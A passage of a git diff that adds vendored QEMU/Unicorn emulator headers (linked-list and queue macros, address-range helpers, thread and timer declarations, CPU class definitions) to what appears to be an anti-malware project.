= &(listelm)->field.le_next; \ +} while (/*CONSTCOND*/0) + +#define QLIST_INSERT_BEFORE(listelm, elm, field) do { \ + (elm)->field.le_prev = (listelm)->field.le_prev; \ + (elm)->field.le_next = (listelm); \ + *(listelm)->field.le_prev = (elm); \ + (listelm)->field.le_prev = &(elm)->field.le_next; \ +} while (/*CONSTCOND*/0) + +#define QLIST_INSERT_HEAD(head, elm, field) do { \ + if (((elm)->field.le_next = (head)->lh_first) != NULL) \ + (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ + (head)->lh_first = (elm); \ + (elm)->field.le_prev = &(head)->lh_first; \ +} while (/*CONSTCOND*/0) + +#define QLIST_INSERT_HEAD_RCU(head, elm, field) do { \ + (elm)->field.le_prev = &(head)->lh_first; \ + (elm)->field.le_next = (head)->lh_first; \ + smp_wmb(); /* fill elm before linking it */ \ + if ((head)->lh_first != NULL) { \ + (head)->lh_first->field.le_prev = &(elm)->field.le_next; \ + } \ + (head)->lh_first = (elm); \ + smp_wmb(); \ +} while (/* CONSTCOND*/0) + +#define QLIST_REMOVE(elm, field) do { \ + if ((elm)->field.le_next != NULL) \ + (elm)->field.le_next->field.le_prev = \ + (elm)->field.le_prev; \ + *(elm)->field.le_prev = (elm)->field.le_next; \ +} while (/*CONSTCOND*/0) + +#define QLIST_FOREACH(var, head, field) \ + for ((var) = ((head)->lh_first); \ + (var); \ + (var) = ((var)->field.le_next)) + +#define QLIST_FOREACH_SAFE(var, head, field, next_var) \ + for ((var) = ((head)->lh_first); \ + (var) && ((next_var) = ((var)->field.le_next), 1); \ + (var) = (next_var)) + +/* + * List access methods. + */ +#define QLIST_EMPTY(head) ((head)->lh_first == NULL) +#define QLIST_FIRST(head) ((head)->lh_first) +#define QLIST_NEXT(elm, field) ((elm)->field.le_next) + + +/* + * Singly-linked List definitions. + */ +#define QSLIST_HEAD(name, type) \ +struct name { \ + struct type *slh_first; /* first element */ \ +} + +#define QSLIST_HEAD_INITIALIZER(head) \ + { NULL } + +#define QSLIST_ENTRY(type) \ +struct { \ + struct type *sle_next; /* next element */ \ +} + +/* + * Singly-linked List functions. + */ +#define QSLIST_INIT(head) do { \ + (head)->slh_first = NULL; \ +} while (/*CONSTCOND*/0) + +#define QSLIST_INSERT_AFTER(slistelm, elm, field) do { \ + (elm)->field.sle_next = (slistelm)->field.sle_next; \ + (slistelm)->field.sle_next = (elm); \ +} while (/*CONSTCOND*/0) + +#define QSLIST_INSERT_HEAD(head, elm, field) do { \ + (elm)->field.sle_next = (head)->slh_first; \ + (head)->slh_first = (elm); \ +} while (/*CONSTCOND*/0) + +#define QSLIST_REMOVE_HEAD(head, field) do { \ + (head)->slh_first = (head)->slh_first->field.sle_next; \ +} while (/*CONSTCOND*/0) + +#define QSLIST_REMOVE_AFTER(slistelm, field) do { \ + (slistelm)->field.sle_next = \ + QSLIST_NEXT(QSLIST_NEXT((slistelm), field), field); \ +} while (/*CONSTCOND*/0) + +#define QSLIST_FOREACH(var, head, field) \ + for((var) = (head)->slh_first; (var); (var) = (var)->field.sle_next) + +#define QSLIST_FOREACH_SAFE(var, head, field, tvar) \ + for ((var) = QSLIST_FIRST((head)); \ + (var) && ((tvar) = QSLIST_NEXT((var), field), 1); \ + (var) = (tvar)) + +/* + * Singly-linked List access methods. + */ +#define QSLIST_EMPTY(head) ((head)->slh_first == NULL) +#define QSLIST_FIRST(head) ((head)->slh_first) +#define QSLIST_NEXT(elm, field) ((elm)->field.sle_next) + + +/* + * Simple queue definitions. + */ +#define QSIMPLEQ_HEAD(name, type) \ +struct name { \ + struct type *sqh_first; /* first element */ \ + struct type **sqh_last; /* addr of last next element */ \ +} + +#define QSIMPLEQ_HEAD_INITIALIZER(head) \ + { NULL, &(head).sqh_first } + +#define QSIMPLEQ_ENTRY(type) \ +struct { \ + struct type *sqe_next; /* next element */ \ +} + +/* + * Simple queue functions. + */ +#define QSIMPLEQ_INIT(head) do { \ + (head)->sqh_first = NULL; \ + (head)->sqh_last = &(head)->sqh_first; \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_INSERT_HEAD(head, elm, field) do { \ + if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ + (head)->sqh_last = &(elm)->field.sqe_next; \ + (head)->sqh_first = (elm); \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_INSERT_TAIL(head, elm, field) do { \ + (elm)->field.sqe_next = NULL; \ + *(head)->sqh_last = (elm); \ + (head)->sqh_last = &(elm)->field.sqe_next; \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ + if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL) \ + (head)->sqh_last = &(elm)->field.sqe_next; \ + (listelm)->field.sqe_next = (elm); \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_REMOVE_HEAD(head, field) do { \ + if (((head)->sqh_first = (head)->sqh_first->field.sqe_next) == NULL)\ + (head)->sqh_last = &(head)->sqh_first; \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_REMOVE(head, elm, type, field) do { \ + if ((head)->sqh_first == (elm)) { \ + QSIMPLEQ_REMOVE_HEAD((head), field); \ + } else { \ + struct type *curelm = (head)->sqh_first; \ + while (curelm->field.sqe_next != (elm)) \ + curelm = curelm->field.sqe_next; \ + if ((curelm->field.sqe_next = \ + curelm->field.sqe_next->field.sqe_next) == NULL) \ + (head)->sqh_last = &(curelm)->field.sqe_next; \ + } \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_FOREACH(var, head, field) \ + for ((var) = ((head)->sqh_first); \ + (var); \ + (var) = ((var)->field.sqe_next)) + +#define QSIMPLEQ_FOREACH_SAFE(var, head, field, next) \ + for ((var) = ((head)->sqh_first); \ + (var) && ((next = ((var)->field.sqe_next)), 1); \ + (var) = (next)) + +#define QSIMPLEQ_CONCAT(head1, head2) do { \ + if (!QSIMPLEQ_EMPTY((head2))) { \ + *(head1)->sqh_last = (head2)->sqh_first; \ + (head1)->sqh_last = (head2)->sqh_last; \ + QSIMPLEQ_INIT((head2)); \ + } \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_LAST(head, type, field) \ + (QSIMPLEQ_EMPTY((head)) ? \ + NULL : \ + ((struct type *)(void *) \ + ((char *)((head)->sqh_last) - offsetof(struct type, field)))) + +/* + * Simple queue access methods. + */ +#define QSIMPLEQ_EMPTY(head) ((head)->sqh_first == NULL) +#define QSIMPLEQ_FIRST(head) ((head)->sqh_first) +#define QSIMPLEQ_NEXT(elm, field) ((elm)->field.sqe_next) + + +/* + * Tail queue definitions. + */ +#define Q_TAILQ_HEAD(name, type, qual) \ +struct name { \ + qual type *tqh_first; /* first element */ \ + qual type *qual *tqh_last; /* addr of last next element */ \ +} +#define QTAILQ_HEAD(name, type) Q_TAILQ_HEAD(name, struct type,) + +#define QTAILQ_HEAD_INITIALIZER(head) \ + { NULL, &(head).tqh_first } + +#define Q_TAILQ_ENTRY(type, qual) \ +struct { \ + qual type *tqe_next; /* next element */ \ + qual type *qual *tqe_prev; /* address of previous next element */\ +} +#define QTAILQ_ENTRY(type) Q_TAILQ_ENTRY(struct type,) + +/* + * Tail queue functions. + */ +#define QTAILQ_INIT(head) do { \ + (head)->tqh_first = NULL; \ + (head)->tqh_last = &(head)->tqh_first; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_INSERT_HEAD(head, elm, field) do { \ + if (((elm)->field.tqe_next = (head)->tqh_first) != NULL) \ + (head)->tqh_first->field.tqe_prev = \ + &(elm)->field.tqe_next; \ + else \ + (head)->tqh_last = &(elm)->field.tqe_next; \ + (head)->tqh_first = (elm); \ + (elm)->field.tqe_prev = &(head)->tqh_first; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_INSERT_TAIL(head, elm, field) do { \ + (elm)->field.tqe_next = NULL; \ + (elm)->field.tqe_prev = (head)->tqh_last; \ + *(head)->tqh_last = (elm); \ + (head)->tqh_last = &(elm)->field.tqe_next; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ + if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != NULL)\ + (elm)->field.tqe_next->field.tqe_prev = \ + &(elm)->field.tqe_next; \ + else \ + (head)->tqh_last = &(elm)->field.tqe_next; \ + (listelm)->field.tqe_next = (elm); \ + (elm)->field.tqe_prev = &(listelm)->field.tqe_next; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_INSERT_BEFORE(listelm, elm, field) do { \ + (elm)->field.tqe_prev = (listelm)->field.tqe_prev; \ + (elm)->field.tqe_next = (listelm); \ + *(listelm)->field.tqe_prev = (elm); \ + (listelm)->field.tqe_prev = &(elm)->field.tqe_next; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_REMOVE(head, elm, field) do { \ + if (((elm)->field.tqe_next) != NULL) \ + (elm)->field.tqe_next->field.tqe_prev = \ + (elm)->field.tqe_prev; \ + else \ + (head)->tqh_last = (elm)->field.tqe_prev; \ + *(elm)->field.tqe_prev = (elm)->field.tqe_next; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_FOREACH(var, head, field) \ + for ((var) = ((head)->tqh_first); \ + (var); \ + (var) = ((var)->field.tqe_next)) + +#define QTAILQ_FOREACH_SAFE(var, head, field, next_var) \ + for ((var) = ((head)->tqh_first); \ + (var) && ((next_var) = ((var)->field.tqe_next), 1); \ + (var) = (next_var)) + +#define QTAILQ_FOREACH_REVERSE(var, head, headname, field) \ + for ((var) = (*(((struct headname *)((head)->tqh_last))->tqh_last)); \ + (var); \ + (var) = (*(((struct headname *)((var)->field.tqe_prev))->tqh_last))) + +/* + * Tail queue access methods. + */ +#define QTAILQ_EMPTY(head) ((head)->tqh_first == NULL) +#define QTAILQ_FIRST(head) ((head)->tqh_first) +#define QTAILQ_NEXT(elm, field) ((elm)->field.tqe_next) + +#define QTAILQ_LAST(head, headname) \ + (*(((struct headname *)((head)->tqh_last))->tqh_last)) +#define QTAILQ_PREV(elm, headname, field) \ + (*(((struct headname *)((elm)->field.tqe_prev))->tqh_last)) + +#endif /* !QEMU_SYS_QUEUE_H_ */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/range.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/range.h new file mode 100644 index 0000000..f5b1c5f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/range.h @@ -0,0 +1,135 @@ +#ifndef QEMU_RANGE_H +#define QEMU_RANGE_H + +#include "unicorn/platform.h" +#include <qemu/typedefs.h> +#include "qemu/queue.h" + +/* + * Operations on 64 bit address ranges. + * Notes: + * - ranges must not wrap around 0, but can include the last byte ~0x0LL. + * - this can not represent a full 0 to ~0x0LL range. + */ + +/* A structure representing a range of addresses. */ +struct Range { + uint64_t begin; /* First byte of the range, or 0 if empty. */ + uint64_t end; /* 1 + the last byte. 0 if range empty or ends at ~0x0LL. */ +}; + +static inline void range_extend(Range *range, Range *extend_by) +{ + if (!extend_by->begin && !extend_by->end) { + return; + } + if (!range->begin && !range->end) { + *range = *extend_by; + return; + } + if (range->begin > extend_by->begin) { + range->begin = extend_by->begin; + } + /* Compare last byte in case region ends at ~0x0LL */ + if (range->end - 1 < extend_by->end - 1) { + range->end = extend_by->end; + } +} + +/* Get last byte of a range from offset + length. + * Undefined for ranges that wrap around 0. */ +static inline uint64_t range_get_last(uint64_t offset, uint64_t len) +{ + return offset + len - 1; +} + +/* Check whether a given range covers a given byte. */ +static inline int range_covers_byte(uint64_t offset, uint64_t len, + uint64_t byte) +{ + return offset <= byte && byte <= range_get_last(offset, len); +} + +/* Check whether 2 given ranges overlap. + * Undefined if ranges that wrap around 0. */ +static inline int ranges_overlap(uint64_t first1, uint64_t len1, + uint64_t first2, uint64_t len2) +{ + uint64_t last1 = range_get_last(first1, len1); + uint64_t last2 = range_get_last(first2, len2); + + return !(last2 < first1 || last1 < first2); +} + +/* 0,1 can merge with 1,2 but don't overlap */ +static inline bool ranges_can_merge(Range *range1, Range *range2) +{ + return !(range1->end < range2->begin || range2->end < range1->begin); +} + +static inline int range_merge(Range *range1, Range *range2) +{ + if (ranges_can_merge(range1, range2)) { + if (range1->end < range2->end) { + range1->end = range2->end; + } + if (range1->begin > range2->begin) { + range1->begin = range2->begin; + } + return 0; + } + + return -1; +} + +static inline GList *g_list_insert_sorted_merged(GList *list, + gpointer data, + GCompareFunc func) +{ + GList *l, *next = NULL; + Range *r, *nextr; + + if (!list) { + list = g_list_insert_sorted(list, data, func); + return list; + } + + nextr = data; + l = list; + while (l && l != next && nextr) { + r = l->data; + if (ranges_can_merge(r, nextr)) { + range_merge(r, nextr); + l = g_list_remove_link(l, next); + next = g_list_next(l); + if (next) { + nextr = next->data; + } else { + nextr = NULL; + } + } else { + l = g_list_next(l); + } + } + + if (!l) { + list = g_list_insert_sorted(list, data, func); + } + + return list; +} + +static inline gint range_compare(gconstpointer a, gconstpointer b) +{ + Range *ra = (Range *)a, *rb = (Range *)b; + if (ra->begin == rb->begin && ra->end == rb->end) { + return 0; + } else if (range_get_last(ra->begin, ra->end) < + range_get_last(rb->begin, rb->end)) { + return -1; + } else { + return 1; + } +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-posix.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-posix.h new file mode 100644 index 0000000..36f2272 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-posix.h @@ -0,0 +1,10 @@ +#ifndef __QEMU_THREAD_POSIX_H +#define __QEMU_THREAD_POSIX_H 1 +#include "pthread.h" +#include <semaphore.h> + +struct QemuThread { + pthread_t thread; +}; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-win32.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-win32.h new file mode 100644 index 0000000..9f82ea2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread-win32.h @@ -0,0 +1,14 @@ +#ifndef __QEMU_THREAD_WIN32_H +#define __QEMU_THREAD_WIN32_H 1 +#include "windows.h" + +typedef struct QemuThreadData QemuThreadData; +struct QemuThread { + QemuThreadData *data; + unsigned tid; +}; + +/* Only valid for joinable threads. */ +HANDLE qemu_thread_get_handle(QemuThread *thread); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread.h new file mode 100644 index 0000000..c5d25f6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/thread.h @@ -0,0 +1,25 @@ +#ifndef __QEMU_THREAD_H +#define __QEMU_THREAD_H 1 + +#include "unicorn/platform.h" + +typedef struct QemuThread QemuThread; + +#ifdef _WIN32 +#include "qemu/thread-win32.h" +#else +#include "qemu/thread-posix.h" +#endif + +#define QEMU_THREAD_JOINABLE 0 +#define QEMU_THREAD_DETACHED 1 + +struct uc_struct; +// return -1 on error, 0 on success +int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, + void *(*start_routine)(void *), + void *arg, int mode); +void *qemu_thread_join(QemuThread *thread); +void qemu_thread_exit(struct uc_struct *uc, void *retval); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/timer.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/timer.h new file mode 100644 index 0000000..d106e68 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/timer.h @@ -0,0 +1,371 @@ +#ifndef QEMU_TIMER_H +#define QEMU_TIMER_H + +#include "qemu/typedefs.h" +#include "qemu-common.h" + +/* timers */ + +#define SCALE_MS 1000000 +#define SCALE_US 1000 +#define SCALE_NS 1 + +/** + * QEMUClockType: + * + * The following clock types are available: + * + * @QEMU_CLOCK_REALTIME: Real time clock + * + * The real time clock should be used only for stuff which does not + * change the virtual machine state, as it is run even if the virtual + * machine is stopped. The real time clock has a frequency of 1000 + * Hz. + * + * @QEMU_CLOCK_VIRTUAL: virtual clock + * + * The virtual clock is only run during the emulation. It is stopped + * when the virtual machine is stopped. Virtual timers use a high + * precision clock, usually cpu cycles (use ticks_per_sec). + * + * @QEMU_CLOCK_HOST: host clock + * + * The host clock should be use for device models that emulate accurate + * real time sources. It will continue to run when the virtual machine + * is suspended, and it will reflect system time changes the host may + * undergo (e.g. due to NTP). The host clock has the same precision as + * the virtual clock. + */ + +typedef enum { + QEMU_CLOCK_REALTIME = 0, + QEMU_CLOCK_VIRTUAL = 1, + QEMU_CLOCK_HOST = 2, + QEMU_CLOCK_MAX +} QEMUClockType; + +typedef struct QEMUTimerList QEMUTimerList; + +struct QEMUTimerListGroup { + QEMUTimerList *tl[QEMU_CLOCK_MAX]; +}; + +typedef void QEMUTimerCB(void *opaque); +typedef void QEMUTimerListNotifyCB(void *opaque); + +struct QEMUTimer { + int64_t expire_time; /* in nanoseconds */ + QEMUTimerList *timer_list; + QEMUTimerCB *cb; + void *opaque; + QEMUTimer *next; + int scale; +}; + +/* + * QEMUClockType + */ + +/* + * qemu_clock_get_ns; + * @type: the clock type + * + * Get the nanosecond value of a clock with + * type @type + * + * Returns: the clock value in nanoseconds + */ +int64_t qemu_clock_get_ns(QEMUClockType type); + +/** + * qemu_clock_get_ms; + * @type: the clock type + * + * Get the millisecond value of a clock with + * type @type + * + * Returns: the clock value in milliseconds + */ +static inline int64_t qemu_clock_get_ms(QEMUClockType type) +{ + return qemu_clock_get_ns(type) / SCALE_MS; +} + +/** + * qemu_clock_get_us; + * @type: the clock type + * + * Get the microsecond value of a clock with + * type @type + * + * Returns: the clock value in microseconds + */ +static inline int64_t qemu_clock_get_us(QEMUClockType type) +{ + return qemu_clock_get_ns(type) / SCALE_US; +} + +/** + * qemu_timeout_ns_to_ms: + * @ns: nanosecond timeout value + * + * Convert a nanosecond timeout value (or -1) to + * a millisecond value (or -1), always rounding up. + * + * Returns: millisecond timeout value + */ +int qemu_timeout_ns_to_ms(int64_t ns); + +/** + * qemu_soonest_timeout: + * @timeout1: first timeout in nanoseconds (or -1 for infinite) + * @timeout2: second timeout in nanoseconds (or -1 for infinite) + * + * Calculates the soonest of two timeout values. -1 means infinite, which + * is later than any other value. + * + * Returns: soonest timeout value in nanoseconds (or -1 for infinite) + */ +static inline int64_t qemu_soonest_timeout(int64_t timeout1, int64_t timeout2) +{ + /* we can abuse the fact that -1 (which means infinite) is a maximal + * value when cast to unsigned. As this is disgusting, it's kept in + * one inline function. + */ + return ((uint64_t) timeout1 < (uint64_t) timeout2) ? timeout1 : timeout2; +} + +/** + * initclocks: + * + * Initialise the clock & timer infrastructure + */ +void init_clocks(void); + +int64_t cpu_get_ticks(void); +/* Caller must hold BQL */ +void cpu_enable_ticks(void); +/* Caller must hold BQL */ +void cpu_disable_ticks(void); + +static inline int64_t get_ticks_per_sec(void) +{ + return 1000000000LL; +} + +/* + * Low level clock functions + */ + +/* real time host monotonic timer */ +static inline int64_t get_clock_realtime(void) +{ + struct timeval tv; + + gettimeofday(&tv, NULL); + return tv.tv_sec * 1000000000LL + (tv.tv_usec * 1000); +} + +/* Warning: don't insert tracepoints into these functions, they are + also used by simpletrace backend and tracepoints would cause + an infinite recursion! */ +#ifdef _WIN32 +extern int64_t clock_freq; + +static inline int64_t get_clock(void) +{ + LARGE_INTEGER ti; + QueryPerformanceCounter(&ti); + return muldiv64(ti.QuadPart, (uint32_t)get_ticks_per_sec(), (uint32_t)clock_freq); +} + +#else + +static inline int64_t get_clock(void) +{ + return get_clock_realtime(); +} +#endif + +/* icount */ +int64_t cpu_get_icount(void); +int64_t cpu_get_clock(void); +int64_t cpu_get_clock_offset(void); +int64_t cpu_icount_to_ns(int64_t icount); + +/*******************************************/ +/* host CPU ticks (if available) */ + +#if defined(_ARCH_PPC) + +static inline int64_t cpu_get_real_ticks(void) +{ + int64_t retval; +#ifdef _ARCH_PPC64 + /* This reads timebase in one 64bit go and includes Cell workaround from: + http://ozlabs.org/pipermail/linuxppc-dev/2006-October/027052.html + */ + __asm__ __volatile__ ("mftb %0\n\t" + "cmpwi %0,0\n\t" + "beq- $-8" + : "=r" (retval)); +#else + /* http://ozlabs.org/pipermail/linuxppc-dev/1999-October/003889.html */ + unsigned long junk; + __asm__ __volatile__ ("mfspr %1,269\n\t" /* mftbu */ + "mfspr %L0,268\n\t" /* mftb */ + "mfspr %0,269\n\t" /* mftbu */ + "cmpw %0,%1\n\t" + "bne $-16" + : "=r" (retval), "=r" (junk)); +#endif + return retval; +} + +#elif defined(__i386__) + +static inline int64_t cpu_get_real_ticks(void) +{ +#ifdef _MSC_VER + return __rdtsc(); +#else + int64_t val; + asm volatile ("rdtsc" : "=A" (val)); + return val; +#endif +} + +#elif defined(__x86_64__) + +static inline int64_t cpu_get_real_ticks(void) +{ +#ifdef _MSC_VER + return __rdtsc(); +#else + uint32_t low,high; + int64_t val; + asm volatile("rdtsc" : "=a" (low), "=d" (high)); + val = high; + val <<= 32; + val |= low; + return val; +#endif +} + +#elif defined(__hppa__) + +static inline int64_t cpu_get_real_ticks(void) +{ + int val; + asm volatile ("mfctl %%cr16, %0" : "=r"(val)); + return val; +} + +#elif defined(__ia64) + +static inline int64_t cpu_get_real_ticks(void) +{ + int64_t val; + asm volatile ("mov %0 = ar.itc" : "=r"(val) :: "memory"); + return val; +} + +#elif defined(__s390__) + +static inline int64_t cpu_get_real_ticks(void) +{ + int64_t val; + asm volatile("stck 0(%1)" : "=m" (val) : "a" (&val) : "cc"); + return val; +} + +#elif defined(__sparc__) + +static inline int64_t cpu_get_real_ticks (void) +{ +#if defined(_LP64) + uint64_t rval; + asm volatile("rd %%tick,%0" : "=r"(rval)); + return rval; +#else + /* We need an %o or %g register for this. For recent enough gcc + there is an "h" constraint for that. Don't bother with that. */ + union { + uint64_t i64; + struct { + uint32_t high; + uint32_t low; + } i32; + } rval; + asm volatile("rd %%tick,%%g1; srlx %%g1,32,%0; mov %%g1,%1" + : "=r"(rval.i32.high), "=r"(rval.i32.low) : : "g1"); + return rval.i64; +#endif +} + +#elif defined(__mips__) && \ + ((defined(__mips_isa_rev) && __mips_isa_rev >= 2) || defined(__linux__)) +/* + * binutils wants to use rdhwr only on mips32r2 + * but as linux kernel emulate it, it's fine + * to use it. + * + */ +#define MIPS_RDHWR(rd, value) { \ + __asm__ __volatile__ (".set push\n\t" \ + ".set mips32r2\n\t" \ + "rdhwr %0, "rd"\n\t" \ + ".set pop" \ + : "=r" (value)); \ + } + +static inline int64_t cpu_get_real_ticks(void) +{ + /* On kernels >= 2.6.25 rdhwr <reg>, $2 and $3 are emulated */ + uint32_t count; + static uint32_t cyc_per_count = 0; + + if (!cyc_per_count) { + MIPS_RDHWR("$3", cyc_per_count); + } + + MIPS_RDHWR("$2", count); + return (int64_t)(count * cyc_per_count); +} + +#elif defined(__alpha__) + +static inline int64_t cpu_get_real_ticks(void) +{ + uint64_t cc; + uint32_t cur, ofs; + + asm volatile("rpcc %0" : "=r"(cc)); + cur = cc; + ofs = cc >> 32; + return cur - ofs; +} + +#else +/* The host CPU doesn't have an easily accessible cycle counter. + Just return a monotonically increasing value. This will be + totally wrong, but hopefully better than nothing. */ +static inline int64_t cpu_get_real_ticks (void) +{ + static int64_t ticks = 0; + return ticks++; +} +#endif + +#ifdef CONFIG_PROFILER +static inline int64_t profile_getclock(void) +{ + return cpu_get_real_ticks(); +} + +extern int64_t qemu_time, qemu_time_start; +extern int64_t tlb_flush_time; +extern int64_t dev_time; +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/typedefs.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/typedefs.h new file mode 100644 index 0000000..d9759fc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/typedefs.h @@ -0,0 +1,80 @@ +#ifndef QEMU_TYPEDEFS_H +#define QEMU_TYPEDEFS_H + +/* A load of opaque types so that device init declarations don't have to + pull in all the real definitions. */ +typedef struct QEMUTimer QEMUTimer; +typedef struct QEMUTimerListGroup QEMUTimerListGroup; +typedef struct QEMUFile QEMUFile; +typedef struct QEMUBH QEMUBH; + +typedef struct AioContext AioContext; + +typedef struct Visitor Visitor; + +typedef struct MigrationParams MigrationParams; + +typedef struct Property Property; +typedef struct PropertyInfo PropertyInfo; +typedef struct CompatProperty CompatProperty; +typedef struct DeviceState DeviceState; +typedef struct BusState BusState; +typedef struct BusClass BusClass; + +typedef struct AddressSpace AddressSpace; +typedef struct MemoryRegion MemoryRegion; +typedef struct MemoryRegionSection MemoryRegionSection; +typedef struct MemoryListener MemoryListener; + +typedef struct MemoryMappingList MemoryMappingList; + +typedef struct QEMUMachine QEMUMachine; +typedef struct MachineClass MachineClass; +typedef struct MachineState MachineState; +typedef struct NICInfo NICInfo; +typedef struct HCIInfo HCIInfo; +typedef struct AudioState AudioState; +typedef struct BlockBackend BlockBackend; +typedef struct BlockDriverState BlockDriverState; +typedef struct DriveInfo DriveInfo; +typedef struct DisplayState DisplayState; +typedef struct DisplayChangeListener DisplayChangeListener; +typedef struct DisplaySurface DisplaySurface; +typedef struct PixelFormat PixelFormat; +typedef struct QemuConsole QemuConsole; +typedef struct CharDriverState CharDriverState; +typedef struct MACAddr MACAddr; +typedef struct NetClientState NetClientState; +typedef struct I2CBus I2CBus; +typedef struct ISABus ISABus; +typedef struct ISADevice ISADevice; +typedef struct SMBusDevice SMBusDevice; +typedef struct PCIHostState PCIHostState; +typedef struct PCIExpressHost PCIExpressHost; +typedef struct PCIBus PCIBus; +typedef struct PCIDevice PCIDevice; +typedef struct PCIExpressDevice PCIExpressDevice; +typedef struct PCIBridge PCIBridge; +typedef struct PCIEAERMsg PCIEAERMsg; +typedef struct PCIEAERLog PCIEAERLog; +typedef struct PCIEAERErr PCIEAERErr; +typedef struct PCIEPort PCIEPort; +typedef struct PCIESlot PCIESlot; +typedef struct MSIMessage MSIMessage; +typedef struct SerialState SerialState; +typedef struct PCMCIACardState PCMCIACardState; +typedef struct MouseTransformInfo MouseTransformInfo; +typedef struct uWireSlave uWireSlave; +typedef struct I2SCodec I2SCodec; +typedef struct SSIBus SSIBus; +typedef struct EventNotifier EventNotifier; +typedef struct VirtIODevice VirtIODevice; +typedef struct QEMUSGList QEMUSGList; +typedef struct QEMUSizedBuffer QEMUSizedBuffer; +typedef struct SHPCDevice SHPCDevice; +typedef struct FWCfgState FWCfgState; +typedef struct PcGuestInfo PcGuestInfo; +typedef struct Range Range; +typedef struct AdapterInfo AdapterInfo; + +#endif /* QEMU_TYPEDEFS_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/cpu.h new file mode 100644 index 0000000..3a24f78 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/cpu.h @@ -0,0 +1,629 @@ +/* + * QEMU CPU model + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * <http://www.gnu.org/licenses/gpl-2.0.html> + */ +#ifndef QEMU_CPU_H +#define QEMU_CPU_H + +#include <signal.h> +#include <setjmp.h> +#include "hw/qdev-core.h" +#include "exec/hwaddr.h" +#include "qemu/queue.h" +#include "qemu/thread.h" +#include "qemu/typedefs.h" + +typedef int (*WriteCoreDumpFunction)(const void *buf, size_t size, + void *opaque); + +/** + * vaddr: + * Type wide enough to contain any #target_ulong virtual address. + */ +typedef uint64_t vaddr; +#define VADDR_PRId PRId64 +#define VADDR_PRIu PRIu64 +#define VADDR_PRIo PRIo64 +#define VADDR_PRIx PRIx64 +#define VADDR_PRIX PRIX64 +#define VADDR_MAX UINT64_MAX + +/** + * SECTION:cpu + * @section_id: QEMU-cpu + * @title: CPU Class + * @short_description: Base class for all CPUs + */ + +#define TYPE_CPU "cpu" + +/* Since this macro is used a lot in hot code paths and in conjunction with + * FooCPU *foo_env_get_cpu(), we deviate from usual QOM practice by using + * an unchecked cast. + */ +#define CPU(obj) ((CPUState *)(obj)) + +#define CPU_CLASS(uc, class) OBJECT_CLASS_CHECK(uc, CPUClass, (class), TYPE_CPU) +#define CPU_GET_CLASS(uc, obj) OBJECT_GET_CLASS(uc, CPUClass, (obj), TYPE_CPU) + +typedef struct CPUState CPUState; + +typedef void (*CPUUnassignedAccess)(CPUState *cpu, hwaddr addr, + bool is_write, bool is_exec, int opaque, + unsigned size); + +struct TranslationBlock; + +/** + * CPUClass: + * @class_by_name: Callback to map -cpu command line model name to an + * instantiatable CPU type. + * @parse_features: Callback to parse command line arguments. + * @reset: Callback to reset the #CPUState to its initial state. + * @reset_dump_flags: #CPUDumpFlags to use for reset logging. + * @has_work: Callback for checking if there is work to do. + * @do_interrupt: Callback for interrupt handling. + * @do_unassigned_access: Callback for unassigned access handling. + * @do_unaligned_access: Callback for unaligned access handling, if + * the target defines #ALIGNED_ONLY. + * @memory_rw_debug: Callback for GDB memory access. + * @dump_state: Callback for dumping state. + * @dump_statistics: Callback for dumping statistics. + * @get_arch_id: Callback for getting architecture-dependent CPU ID. + * @get_paging_enabled: Callback for inquiring whether paging is enabled. + * @get_memory_mapping: Callback for obtaining the memory mappings. 